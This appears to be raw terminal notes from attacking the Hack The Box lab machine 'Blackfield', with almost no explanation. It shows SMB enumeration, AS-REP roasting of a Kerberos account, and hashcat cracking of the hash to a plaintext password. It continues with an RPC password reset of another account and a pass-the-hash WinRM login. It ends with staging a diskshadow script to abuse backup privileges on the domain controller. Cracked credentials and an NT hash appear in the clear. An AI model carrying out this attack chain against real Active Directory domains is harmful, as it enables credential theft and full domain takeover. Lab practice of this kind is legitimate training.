┌─[npe@pcs-pentest]─[~/Documents/HTB/lab/blackfield]
└──╼ $crackmapexec smb 10.10.10.192 --shares -u 'test' -p ''
SMB         10.10.10.192    445    DC01             [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\test: 
SMB         10.10.10.192    445    DC01             [+] Enumerated shares
SMB         10.10.10.192    445    DC01             Share           Permissions     Remark
SMB         10.10.10.192    445    DC01             -----           -----------     ------
SMB         10.10.10.192    445    DC01             ADMIN$                          Remote Admin
SMB         10.10.10.192    445    DC01             C$                              Default share
SMB         10.10.10.192    445    DC01             forensic                        Forensic / Audit share.
SMB         10.10.10.192    445    DC01             IPC$            READ            Remote IPC
SMB         10.10.10.192    445    DC01             NETLOGON                        Logon server share 
SMB         10.10.10.192    445    DC01             profiles$       READ            
SMB         10.10.10.192    445    DC01             SYSVOL                          Logon server share 
┌─[npe@pcs-pentest]─[~/Documents/HTB/lab/blackfield]


┌─[✗]─[npe@pcs-pentest]─[~/Documents/HTB/lab/blackfield]
└──╼ $smbclient -L 10.10.10.192 -U 'asdas'
Enter WORKGROUP\asdas's password: 

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	forensic        Disk      Forensic / Audit share.
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	profiles$       Disk      
	SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available
┌─[npe@pcs-pentest]─[~/Documents/HTB/lab/blackfield]
└──╼ $
┌─[npe@pcs-pentest]─[~/Documents/HTB/lab/blackfield]
└──╼ $smbclient '//10.10.10.192/profiles$'
Enter WORKGROUP\npe's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Jun  3 18:47:12 2020
  ..                                  D        0  Wed Jun  3 18:47:12 2020
  AAlleni                             D        0  Wed Jun  3 18:47:11 2020
  ABarteski                           D        0  Wed Jun  3 18:47:11 2020
  ABekesz                             D        0  Wed Jun  3 18:47:11 2020
  ABenzies                            D        0  Wed Jun  3 18:47:11 2020
  ABiemiller                          D        0  Wed Jun  3 18:47:11 2020
  AChampken                           D        0  Wed Jun  3 18:47:11 2020
  ACheretei                           D        0  Wed Jun  3 18:47:11 2020
  ACsonaki                            D        0  Wed Jun  3 18:47:11 2020
  AHigchens                           D        0  Wed Jun  3 18:47:11 2020
  AJaquemai                           D        0  Wed Jun  3 18:47:11 2020
  AKlado                              D        0  Wed Jun  3 18:47:11 2020
  AKoffenburger                       D        0  Wed Jun  3 18:47:11 2020
  AKollolli                           D        0  Wed Jun  3 18:47:11 2020
  AKruppe                             D        0  Wed Jun  3 18:47:11 2020
  AKubale                             D        0  Wed Jun  3 18:47:11 2020
  ALamerz                             D        0  Wed Jun  3 18:47:11 2020
  AMaceldon                           D        0  Wed Jun  3 18:47:11 2020
  AMasalunga                          D        0  Wed Jun  3 18:47:11 2020
  ANavay                              D        0  Wed Jun  3 18:47:11 2020
  ANesterova                          D        0  Wed Jun  3 18:47:11 2020
  ANeusse                             D        0  Wed Jun  3 18:47:11 2020
  AOkleshen                           D        0  Wed Jun  3 18:47:11 2020
  APustulka                           D        0  Wed Jun  3 18:47:11 2020
  ARotella                            D        0  Wed Jun  3 18:47:11 2020
  ASanwardeker                        D        0  Wed Jun  3 18:47:11 2020
  AShadaia                            D        0  Wed Jun  3 18:47:11 2020
  ASischo                             D        0  Wed Jun  3 18:47:11 2020
  ASpruce                             D        0  Wed Jun  3 18:47:11 2020
  ATakach                             D        0  Wed Jun  3 18:47:11 2020
  ATaueg                              D        0  Wed Jun  3 18:47:11 2020
  ATwardowski                         D        0  Wed Jun  3 18:47:11 2020
  audit2020                           D        0  Wed Jun  3 18:47:11 2020
  AWangenheim                         D        0  Wed Jun  3 18:47:11 2020
  AWorsey                             D        0  Wed Jun  3 18:47:11 2020
  AZigmunt                            D        0  Wed Jun  3 18:47:11 2020
  BBakajza                            D        0  Wed Jun  3 18:47:11 2020
  BBeloucif                           D        0  Wed Jun  3 18:47:11 2020
  BCarmitcheal                        D        0  Wed Jun  3 18:47:11 2020
  BConsultant                         D        0  Wed Jun  3 18:47:11 2020
  BErdossy                            D        0  Wed Jun  3 18:47:11 2020
  BGeminski                           D        0  Wed Jun  3 18:47:11 2020
  BLostal                             D        0  Wed Jun  3 18:47:11 2020
  BMannise                            D        0  Wed Jun  3 18:47:11 2020
  BNovrotsky                          D        0  Wed Jun  3 18:47:11 2020
  BRigiero                            D        0  Wed Jun  3 18:47:11 2020
  BSamkoses                           D        0  Wed Jun  3 18:47:11 2020
  BZandonella                         D        0  Wed Jun  3 18:47:11 2020
  CAcherman                           D        0  Wed Jun  3 18:47:12 2020
  CAkbari                             D        0  Wed Jun  3 18:47:12 2020
  CAldhowaihi                         D        0  Wed Jun  3 18:47:12 2020
  CArgyropolous                       D        0  Wed Jun  3 18:47:12 2020
  CDufrasne                           D        0  Wed Jun  3 18:47:12 2020
  CGronk                              D        0  Wed Jun  3 18:47:11 2020
  Chiucarello                         D        0  Wed Jun  3 18:47:11 2020
  Chiuccariello                       D        0  Wed Jun  3 18:47:12 2020
  CHoytal                             D        0  Wed Jun  3 18:47:12 2020
  CKijauskas                          D        0  Wed Jun  3 18:47:12 2020
  CKolbo                              D        0  Wed Jun  3 18:47:12 2020
  CMakutenas                          D        0  Wed Jun  3 18:47:12 2020
  CMorcillo                           D        0  Wed Jun  3 18:47:11 2020
  CSchandall                          D        0  Wed Jun  3 18:47:12 2020
  CSelters                            D        0  Wed Jun  3 18:47:12 2020
  CTolmie                             D        0  Wed Jun  3 18:47:12 2020
  DCecere                             D        0  Wed Jun  3 18:47:12 2020
  DChintalapalli                      D        0  Wed Jun  3 18:47:12 2020
  DCwilich                            D        0  Wed Jun  3 18:47:12 2020
  DGarbatiuc                          D        0  Wed Jun  3 18:47:12 2020
  DKemesies                           D        0  Wed Jun  3 18:47:12 2020
  DMatuka                             D        0  Wed Jun  3 18:47:12 2020
  DMedeme                             D        0  Wed Jun  3 18:47:12 2020
  DMeherek                            D        0  Wed Jun  3 18:47:12 2020
  DMetych                             D        0  Wed Jun  3 18:47:12 2020
  DPaskalev                           D        0  Wed Jun  3 18:47:12 2020
  DPriporov                           D        0  Wed Jun  3 18:47:12 2020
  DRusanovskaya                       D        0  Wed Jun  3 18:47:12 2020
  DVellela                            D        0  Wed Jun  3 18:47:12 2020
  DVogleson                           D        0  Wed Jun  3 18:47:12 2020
  DZwinak                             D        0  Wed Jun  3 18:47:12 2020
  EBoley                              D        0  Wed Jun  3 18:47:12 2020
  EEulau                              D        0  Wed Jun  3 18:47:12 2020
  EFeatherling                        D        0  Wed Jun  3 18:47:12 2020
  EFrixione                           D        0  Wed Jun  3 18:47:12 2020
  EJenorik                            D        0  Wed Jun  3 18:47:12 2020
  EKmilanovic                         D        0  Wed Jun  3 18:47:12 2020
  ElKatkowsky                         D        0  Wed Jun  3 18:47:12 2020
  EmaCaratenuto                       D        0  Wed Jun  3 18:47:12 2020
  EPalislamovic                       D        0  Wed Jun  3 18:47:12 2020
  EPryar                              D        0  Wed Jun  3 18:47:12 2020
  ESachhitello                        D        0  Wed Jun  3 18:47:12 2020
  ESariotti                           D        0  Wed Jun  3 18:47:12 2020
  ETurgano                            D        0  Wed Jun  3 18:47:12 2020
  EWojtila                            D        0  Wed Jun  3 18:47:12 2020
  FAlirezai                           D        0  Wed Jun  3 18:47:12 2020
  FBaldwind                           D        0  Wed Jun  3 18:47:12 2020
  FBroj                               D        0  Wed Jun  3 18:47:12 2020
  FDeblaquire                         D        0  Wed Jun  3 18:47:12 2020
  FDegeorgio                          D        0  Wed Jun  3 18:47:12 2020
  FianLaginja                         D        0  Wed Jun  3 18:47:12 2020
  FLasokowski                         D        0  Wed Jun  3 18:47:12 2020
  FPflum                              D        0  Wed Jun  3 18:47:12 2020
  FReffey                             D        0  Wed Jun  3 18:47:12 2020
  GaBelithe                           D        0  Wed Jun  3 18:47:12 2020
  Gareld                              D        0  Wed Jun  3 18:47:12 2020
  GBatowski                           D        0  Wed Jun  3 18:47:12 2020
  GForshalger                         D        0  Wed Jun  3 18:47:12 2020
  GGomane                             D        0  Wed Jun  3 18:47:12 2020
  GHisek                              D        0  Wed Jun  3 18:47:12 2020
  GMaroufkhani                        D        0  Wed Jun  3 18:47:12 2020
  GMerewether                         D        0  Wed Jun  3 18:47:12 2020
  GQuinniey                           D        0  Wed Jun  3 18:47:12 2020
  GRoswurm                            D        0  Wed Jun  3 18:47:12 2020
  GWiegard                            D        0  Wed Jun  3 18:47:12 2020
  HBlaziewske                         D        0  Wed Jun  3 18:47:12 2020
  HColantino                          D        0  Wed Jun  3 18:47:12 2020
  HConforto                           D        0  Wed Jun  3 18:47:12 2020
  HCunnally                           D        0  Wed Jun  3 18:47:12 2020
  HGougen                             D        0  Wed Jun  3 18:47:12 2020
  HKostova                            D        0  Wed Jun  3 18:47:12 2020
  IChristijr                          D        0  Wed Jun  3 18:47:12 2020
  IKoledo                             D        0  Wed Jun  3 18:47:12 2020
  IKotecky                            D        0  Wed Jun  3 18:47:12 2020
  ISantosi                            D        0  Wed Jun  3 18:47:12 2020
  JAngvall                            D        0  Wed Jun  3 18:47:12 2020
  JBehmoiras                          D        0  Wed Jun  3 18:47:12 2020
  JDanten                             D        0  Wed Jun  3 18:47:12 2020
  JDjouka                             D        0  Wed Jun  3 18:47:12 2020
  JKondziola                          D        0  Wed Jun  3 18:47:12 2020
  JLeytushsenior                      D        0  Wed Jun  3 18:47:12 2020
  JLuthner                            D        0  Wed Jun  3 18:47:12 2020
  JMoorehendrickson                   D        0  Wed Jun  3 18:47:12 2020
  JPistachio                          D        0  Wed Jun  3 18:47:12 2020
  JScima                              D        0  Wed Jun  3 18:47:12 2020
  JSebaali                            D        0  Wed Jun  3 18:47:12 2020
  JShoenherr                          D        0  Wed Jun  3 18:47:12 2020
  JShuselvt                           D        0  Wed Jun  3 18:47:12 2020
  KAmavisca                           D        0  Wed Jun  3 18:47:12 2020
  KAtolikian                          D        0  Wed Jun  3 18:47:12 2020
  KBrokinn                            D        0  Wed Jun  3 18:47:12 2020
  KCockeril                           D        0  Wed Jun  3 18:47:12 2020
  KColtart                            D        0  Wed Jun  3 18:47:12 2020
  KCyster                             D        0  Wed Jun  3 18:47:12 2020
  KDorney                             D        0  Wed Jun  3 18:47:12 2020
  KKoesno                             D        0  Wed Jun  3 18:47:12 2020
  KLangfur                            D        0  Wed Jun  3 18:47:12 2020
  KMahalik                            D        0  Wed Jun  3 18:47:12 2020
  KMasloch                            D        0  Wed Jun  3 18:47:12 2020
  KMibach                             D        0  Wed Jun  3 18:47:12 2020
  KParvankova                         D        0  Wed Jun  3 18:47:12 2020
  KPregnolato                         D        0  Wed Jun  3 18:47:12 2020
  KRasmor                             D        0  Wed Jun  3 18:47:12 2020
  KShievitz                           D        0  Wed Jun  3 18:47:12 2020
  KSojdelius                          D        0  Wed Jun  3 18:47:12 2020
  KTambourgi                          D        0  Wed Jun  3 18:47:12 2020
  KVlahopoulos                        D        0  Wed Jun  3 18:47:12 2020
  KZyballa                            D        0  Wed Jun  3 18:47:12 2020
  LBajewsky                           D        0  Wed Jun  3 18:47:12 2020
  LBaligand                           D        0  Wed Jun  3 18:47:12 2020
  LBarhamand                          D        0  Wed Jun  3 18:47:12 2020
  LBirer                              D        0  Wed Jun  3 18:47:12 2020
  LBobelis                            D        0  Wed Jun  3 18:47:12 2020
  LChippel                            D        0  Wed Jun  3 18:47:12 2020
  LChoffin                            D        0  Wed Jun  3 18:47:12 2020
  LCominelli                          D        0  Wed Jun  3 18:47:12 2020
  LDruge                              D        0  Wed Jun  3 18:47:12 2020
  LEzepek                             D        0  Wed Jun  3 18:47:12 2020
  LHyungkim                           D        0  Wed Jun  3 18:47:12 2020
  LKarabag                            D        0  Wed Jun  3 18:47:12 2020
  LKirousis                           D        0  Wed Jun  3 18:47:12 2020
  LKnade                              D        0  Wed Jun  3 18:47:12 2020
  LKrioua                             D        0  Wed Jun  3 18:47:12 2020
  LLefebvre                           D        0  Wed Jun  3 18:47:12 2020
  LLoeradeavilez                      D        0  Wed Jun  3 18:47:12 2020
  LMichoud                            D        0  Wed Jun  3 18:47:12 2020
  LTindall                            D        0  Wed Jun  3 18:47:12 2020
  LYturbe                             D        0  Wed Jun  3 18:47:12 2020
  MArcynski                           D        0  Wed Jun  3 18:47:12 2020
  MAthilakshmi                        D        0  Wed Jun  3 18:47:12 2020
  MAttravanam                         D        0  Wed Jun  3 18:47:12 2020
  MBrambini                           D        0  Wed Jun  3 18:47:12 2020
  MHatziantoniou                      D        0  Wed Jun  3 18:47:12 2020
  MHoerauf                            D        0  Wed Jun  3 18:47:12 2020
  MKermarrec                          D        0  Wed Jun  3 18:47:12 2020
  MKillberg                           D        0  Wed Jun  3 18:47:12 2020
  MLapesh                             D        0  Wed Jun  3 18:47:12 2020
  MMakhsous                           D        0  Wed Jun  3 18:47:12 2020
  MMerezio                            D        0  Wed Jun  3 18:47:12 2020
  MNaciri                             D        0  Wed Jun  3 18:47:12 2020
  MShanmugarajah                      D        0  Wed Jun  3 18:47:12 2020
  MSichkar                            D        0  Wed Jun  3 18:47:12 2020
  MTemko                              D        0  Wed Jun  3 18:47:12 2020
  MTipirneni                          D        0  Wed Jun  3 18:47:12 2020
  MTonuri                             D        0  Wed Jun  3 18:47:12 2020
  MVanarsdel                          D        0  Wed Jun  3 18:47:12 2020
  NBellibas                           D        0  Wed Jun  3 18:47:12 2020
  NDikoka                             D        0  Wed Jun  3 18:47:12 2020
  NGenevro                            D        0  Wed Jun  3 18:47:12 2020
  NGoddanti                           D        0  Wed Jun  3 18:47:12 2020
  NMrdirk                             D        0  Wed Jun  3 18:47:12 2020
  NPulido                             D        0  Wed Jun  3 18:47:12 2020
  NRonges                             D        0  Wed Jun  3 18:47:12 2020
  NSchepkie                           D        0  Wed Jun  3 18:47:12 2020
  NVanpraet                           D        0  Wed Jun  3 18:47:12 2020
  OBelghazi                           D        0  Wed Jun  3 18:47:12 2020
  OBushey                             D        0  Wed Jun  3 18:47:12 2020
  OHardybala                          D        0  Wed Jun  3 18:47:12 2020
  OLunas                              D        0  Wed Jun  3 18:47:12 2020
  ORbabka                             D        0  Wed Jun  3 18:47:12 2020
  PBourrat                            D        0  Wed Jun  3 18:47:12 2020
  PBozzelle                           D        0  Wed Jun  3 18:47:12 2020
  PBranti                             D        0  Wed Jun  3 18:47:12 2020
  PCapperella                         D        0  Wed Jun  3 18:47:12 2020
  PCurtz                              D        0  Wed Jun  3 18:47:12 2020
  PDoreste                            D        0  Wed Jun  3 18:47:12 2020
  PGegnas                             D        0  Wed Jun  3 18:47:12 2020
  PMasulla                            D        0  Wed Jun  3 18:47:12 2020
  PMendlinger                         D        0  Wed Jun  3 18:47:12 2020
  PParakat                            D        0  Wed Jun  3 18:47:12 2020
  PProvencer                          D        0  Wed Jun  3 18:47:12 2020
  PTesik                              D        0  Wed Jun  3 18:47:12 2020
  PVinkovich                          D        0  Wed Jun  3 18:47:12 2020
  PVirding                            D        0  Wed Jun  3 18:47:12 2020
  PWeinkaus                           D        0  Wed Jun  3 18:47:12 2020
  RBaliukonis                         D        0  Wed Jun  3 18:47:12 2020
  RBochare                            D        0  Wed Jun  3 18:47:12 2020
  RKrnjaic                            D        0  Wed Jun  3 18:47:12 2020
  RNemnich                            D        0  Wed Jun  3 18:47:12 2020
  RPoretsky                           D        0  Wed Jun  3 18:47:12 2020
  RStuehringer                        D        0  Wed Jun  3 18:47:12 2020
  RSzewczuga                          D        0  Wed Jun  3 18:47:12 2020
  RVallandas                          D        0  Wed Jun  3 18:47:12 2020
  RWeatherl                           D        0  Wed Jun  3 18:47:12 2020
  RWissor                             D        0  Wed Jun  3 18:47:12 2020
  SAbdulagatov                        D        0  Wed Jun  3 18:47:12 2020
  SAjowi                              D        0  Wed Jun  3 18:47:12 2020
  SAlguwaihes                         D        0  Wed Jun  3 18:47:12 2020
  SBonaparte                          D        0  Wed Jun  3 18:47:12 2020
  SBouzane                            D        0  Wed Jun  3 18:47:12 2020
  SChatin                             D        0  Wed Jun  3 18:47:12 2020
  SDellabitta                         D        0  Wed Jun  3 18:47:12 2020
  SDhodapkar                          D        0  Wed Jun  3 18:47:12 2020
  SEulert                             D        0  Wed Jun  3 18:47:12 2020
  SFadrigalan                         D        0  Wed Jun  3 18:47:12 2020
  SGolds                              D        0  Wed Jun  3 18:47:12 2020
  SGrifasi                            D        0  Wed Jun  3 18:47:12 2020
  SGtlinas                            D        0  Wed Jun  3 18:47:12 2020
  SHauht                              D        0  Wed Jun  3 18:47:12 2020
  SHederian                           D        0  Wed Jun  3 18:47:12 2020
  SHelregel                           D        0  Wed Jun  3 18:47:12 2020
  SKrulig                             D        0  Wed Jun  3 18:47:12 2020
  SLewrie                             D        0  Wed Jun  3 18:47:12 2020
  SMaskil                             D        0  Wed Jun  3 18:47:12 2020
  Smocker                             D        0  Wed Jun  3 18:47:12 2020
  SMoyta                              D        0  Wed Jun  3 18:47:12 2020
  SRaustiala                          D        0  Wed Jun  3 18:47:12 2020
  SReppond                            D        0  Wed Jun  3 18:47:12 2020
  SSicliano                           D        0  Wed Jun  3 18:47:12 2020
  SSilex                              D        0  Wed Jun  3 18:47:12 2020
  SSolsbak                            D        0  Wed Jun  3 18:47:12 2020
  STousignaut                         D        0  Wed Jun  3 18:47:12 2020
  support                             D        0  Wed Jun  3 18:47:12 2020
  svc_backup                          D        0  Wed Jun  3 18:47:12 2020
  SWhyte                              D        0  Wed Jun  3 18:47:12 2020
  SWynigear                           D        0  Wed Jun  3 18:47:12 2020
  TAwaysheh                           D        0  Wed Jun  3 18:47:12 2020
  TBadenbach                          D        0  Wed Jun  3 18:47:12 2020
  TCaffo                              D        0  Wed Jun  3 18:47:12 2020
  TCassalom                           D        0  Wed Jun  3 18:47:12 2020
  TEiselt                             D        0  Wed Jun  3 18:47:12 2020
  TFerencdo                           D        0  Wed Jun  3 18:47:12 2020
  TGaleazza                           D        0  Wed Jun  3 18:47:12 2020
  TKauten                             D        0  Wed Jun  3 18:47:12 2020
  TKnupke                             D        0  Wed Jun  3 18:47:12 2020
  TLintlop                            D        0  Wed Jun  3 18:47:12 2020
  TMusselli                           D        0  Wed Jun  3 18:47:12 2020
  TOust                               D        0  Wed Jun  3 18:47:12 2020
  TSlupka                             D        0  Wed Jun  3 18:47:12 2020
  TStausland                          D        0  Wed Jun  3 18:47:12 2020
  TZumpella                           D        0  Wed Jun  3 18:47:12 2020
  UCrofskey                           D        0  Wed Jun  3 18:47:12 2020
  UMarylebone                         D        0  Wed Jun  3 18:47:12 2020
  UPyrke                              D        0  Wed Jun  3 18:47:12 2020
  VBublavy                            D        0  Wed Jun  3 18:47:12 2020
  VButziger                           D        0  Wed Jun  3 18:47:12 2020
  VFuscca                             D        0  Wed Jun  3 18:47:12 2020
  VLitschauer                         D        0  Wed Jun  3 18:47:12 2020
  VMamchuk                            D        0  Wed Jun  3 18:47:12 2020
  VMarija                             D        0  Wed Jun  3 18:47:12 2020
  VOlaosun                            D        0  Wed Jun  3 18:47:12 2020
  VPapalouca                          D        0  Wed Jun  3 18:47:12 2020
  WSaldat                             D        0  Wed Jun  3 18:47:12 2020
  WVerzhbytska                        D        0  Wed Jun  3 18:47:12 2020
  WZelazny                            D        0  Wed Jun  3 18:47:12 2020
  XBemelen                            D        0  Wed Jun  3 18:47:12 2020
  XDadant                             D        0  Wed Jun  3 18:47:12 2020
  XDebes                              D        0  Wed Jun  3 18:47:12 2020
  XKonegni                            D        0  Wed Jun  3 18:47:12 2020
  XRykiel                             D        0  Wed Jun  3 18:47:12 2020
  YBleasdale                          D        0  Wed Jun  3 18:47:12 2020
  YHuftalin                           D        0  Wed Jun  3 18:47:12 2020
  YKivlen                             D        0  Wed Jun  3 18:47:12 2020
  YKozlicki                           D        0  Wed Jun  3 18:47:12 2020
  YNyirenda                           D        0  Wed Jun  3 18:47:12 2020
  YPredestin                          D        0  Wed Jun  3 18:47:12 2020
  YSeturino                           D        0  Wed Jun  3 18:47:12 2020
  YSkoropada                          D        0  Wed Jun  3 18:47:12 2020
  YVonebers                           D        0  Wed Jun  3 18:47:12 2020
  YZarpentine                         D        0  Wed Jun  3 18:47:12 2020
  ZAlatti                             D        0  Wed Jun  3 18:47:12 2020
  ZKrenselewski                       D        0  Wed Jun  3 18:47:12 2020
  ZMalaab                             D        0  Wed Jun  3 18:47:12 2020
  ZMiick                              D        0  Wed Jun  3 18:47:12 2020
  ZScozzari                           D        0  Wed Jun  3 18:47:12 2020
  ZTimofeeff                          D        0  Wed Jun  3 18:47:12 2020
  ZWausik                             D        0  Wed Jun  3 18:47:12 2020

		7846143 blocks of size 4096. 4126618 blocks available
smb: \> 


Kerbrute

users
audit2020
support
svc_backup


┌─[✗]─[npe@cav3]─[/usr/share/doc/python3-impacket/examples]
└──╼ $python3 GetNPUsers.py -dc-ip 10.10.10.192 -no-pass -usersfile /home/npe/Documents/HTB/lab/blackfield/users.txt blackfield/
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@BLACKFIELD:0059b34a61ce204909a9aadc9045d815$6febd732526fea6ea020556e2ef2cdabeadd43e861dd2c38ba5b864144291397e5c614720cb61b6d0f44db1ee3f89b9634f66cb3573559ba8645c158746a3e56c50a36c2f712654d74ce1c3b0b021a87598b10412a398067ede8ed0e72fdbca25cdf49490f7c7370ec6f48166996e5046b2d1ed5373aa9942369778076fb10ad0beba4e262b3b55c6f92f2bb208dd796806af9f1f0c728f1a974b6d65fa2aeb8cb4c3ddd1fdc26d5b4c7fdfc7910084dce19127883ca062c517d8047b5b76891a9c19c6dc49459467fa6c14e8fb1e02ea66fa3251ca61b19d46c7136f4c2ab1160d5e607377b69529a5376777c5d
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
┌─[npe@cav3]─[/usr/share/doc/python3-impacket/examples]


┌─[✗]─[npe@cav3]─[~/Documents/HTB/lab/blackfield]
└──╼ $hashcat -m 18200 --force -a 0 asrepkerbhash.txt /usr/share/wordlists/rockyou.txt 
hashcat (v6.1.1) starting...

$krb5asrep$23$support@BLACKFIELD:0059b34a61ce204909a9aadc9045d815$6febd732526fea6ea020556e2ef2cdabeadd43e861dd2c38ba5b864144291397e5c614720cb61b6d0f44db1ee3f89b9634f66cb3573559ba8645c158746a3e56c50a36c2f712654d74ce1c3b0b021a87598b10412a398067ede8ed0e72fdbca25cdf49490f7c7370ec6f48166996e5046b2d1ed5373aa9942369778076fb10ad0beba4e262b3b55c6f92f2bb208dd796806af9f1f0c728f1a974b6d65fa2aeb8cb4c3ddd1fdc26d5b4c7fdfc7910084dce19127883ca062c517d8047b5b76891a9c19c6dc49459467fa6c14e8fb1e02ea66fa3251ca61b19d46c7136f4c2ab1160d5e607377b69529a5376777c5d:#00^BlackKnight
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, AS-REP
Hash.Target......: $krb5asrep$23$support@BLACKFIELD:0059b34a61ce204909...777c5d
Time.Started.....: Fri Feb 12 16:31:11 2021, (37 secs)
Time.Estimated...: Fri Feb 12 16:31:48 2021, (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   398.0 kH/s (10.47ms) @ Accel:32 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 14336000/14344385 (99.94%)
Rejected.........: 0/14336000 (0.00%)
Restore.Point....: 14327808/14344385 (99.88%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: $Cah$ -> #!hrvert

Started: Fri Feb 12 16:31:00 2021
Stopped: Fri Feb 12 16:31:49 2021

#00^BlackKnight

┌─[npe@cav3]─[~/Documents/HTB/lab/blackfield]
└──╼ $crackmapexec smb 10.10.10.192 -u support -p '#00^BlackKnight' --shares
SMB         10.10.10.192    445    DC01             [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\support:#00^BlackKnight 
SMB         10.10.10.192    445    DC01             [+] Enumerated shares
SMB         10.10.10.192    445    DC01             Share           Permissions     Remark
SMB         10.10.10.192    445    DC01             -----           -----------     ------
SMB         10.10.10.192    445    DC01             ADMIN$                          Remote Admin
SMB         10.10.10.192    445    DC01             C$                              Default share
SMB         10.10.10.192    445    DC01             forensic                        Forensic / Audit share.
SMB         10.10.10.192    445    DC01             IPC$            READ            Remote IPC
SMB         10.10.10.192    445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.10.192    445    DC01             profiles$       READ            
SMB         10.10.10.192    445    DC01             SYSVOL          READ            Logon server share 
┌─[npe@cav3]─[~/Documents/HTB/lab/blackfield]
└──╼ $

──╼ $rpcclient 10.10.10.192 -U support
Enter WORKGROUP\support's password: 
rpcclient $> setuserinfo2 Audit2020 23 'WhiteKnight2020!'

┌─[✗]─[npe@cav3]─[~]
└──╼ $crackmapexec smb 10.10.10.192 -u Audit2020 -p WhiteKnight2020!
SMB         10.10.10.192    445    DC01             [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\Audit2020:WhiteKnight2020! 
┌─[npe@cav3]─[~]
└──╼ $
┌─[npe@cav3]─[~]
└──╼ $crackmapexec smb 10.10.10.192 -u Audit2020 -p WhiteKnight2020! --shares
SMB         10.10.10.192    445    DC01             [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\Audit2020:WhiteKnight2020! 
SMB         10.10.10.192    445    DC01             [+] Enumerated shares
SMB         10.10.10.192    445    DC01             Share           Permissions     Remark
SMB         10.10.10.192    445    DC01             -----           -----------     ------
SMB         10.10.10.192    445    DC01             ADMIN$                          Remote Admin
SMB         10.10.10.192    445    DC01             C$                              Default share
SMB         10.10.10.192    445    DC01             forensic        READ            Forensic / Audit share.
SMB         10.10.10.192    445    DC01             IPC$            READ            Remote IPC
SMB         10.10.10.192    445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.10.192    445    DC01             profiles$       READ            
SMB         10.10.10.192    445    DC01             SYSVOL          READ            Logon server share 
┌─[npe@cav3]─[~]
└──╼ $

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.



─[npe@cav3]─[~]
└──╼ $evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_backup\Documents> 

┌─[npe@cav3]─[~/Documents/HTB/lab/blackfield]
└──╼ $dd if=/dev/zero of=ntfs.disk bs=1024M count=2
2147483648 bytes (2.1 GB, 2.0 GiB) copied, 42 s, 51.1 MB/s
2+0 records in
2+0 records out
2147483648 bytes (2.1 GB, 2.0 GiB) copied, 42.044 s, 51.1 MB/s
┌─[npe@cav3]─[~/Documents/HTB/lab/blackfield]
└──╼ $sudo losetup -fP ntfs.disk
[sudo] password for npe: 
┌─[npe@cav3]─[~/Documents/HTB/lab/blackfield]
└──╼ $losetup -a
/dev/loop0: []: (/home/npe/Documents/HTB/lab/blackfield/ntfs.disk)
┌─[npe@cav3]─[~/Documents/HTB/lab/blackfield]
└──╼ $
┌─[npe@cav3]─[~/Documents/HTB/lab/blackfield]
└──╼ $sudo mkfs.ntfs /dev/loop0
The partition start sector was not specified for /dev/loop0 and it could not be obtained automatically.  It has been set to 0.
The number of sectors per track was not specified for /dev/loop0 and it could not be obtained automatically.  It has been set to 0.
The number of heads was not specified for /dev/loop0 and it could not be obtained automatically.  It has been set to 0.
Cluster size has been automatically set to 4096 bytes.
To boot from a device, Windows needs the 'partition start sector', the 'sectors per track' and the 'number of heads' to be set.
Windows will not be able to boot from this device.
Initializing device with zeroes: 100% - Done.
Creating NTFS volume structures.
mkntfs completed successfully. Have a nice day.
┌─[npe@cav3]─[~/Documents/HTB/lab/blackfield]
└──╼ $sudo mount /dev/loop0 smb/
┌─[npe@cav3]─[~/Documents/HTB/lab/blackfield]
└──╼ $cat script
set context persistent nowriters
add volume c: alias test
create
expose test z:
┌─[npe@cav3]─[~/Documents/HTB/lab/blackfield]
└──╼ $ls
asrepkerbhash.txt  nmap.nmap  notes.txt  script  users.txt
nmap.gnmap         nmap.xml   ntfs.disk  smb
┌─[npe@cav3]─[~/Documents/HTB/lab/blackfield]
└──╼ $updog
[+] Serving /home/npe/Documents/HTB/lab/blackfield...
 * Running on http://0.0.0.0:9090/ (Press CTRL+C to quit)
10.10.10.192 - - [18/Feb/2021 09:32:38] "GET /script HTTP/1.1" 200 -

*Evil-WinRM* PS C:\temp> dir


    Directory: C:\temp


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        2/18/2021   8:38 AM             80 script.txt


new route

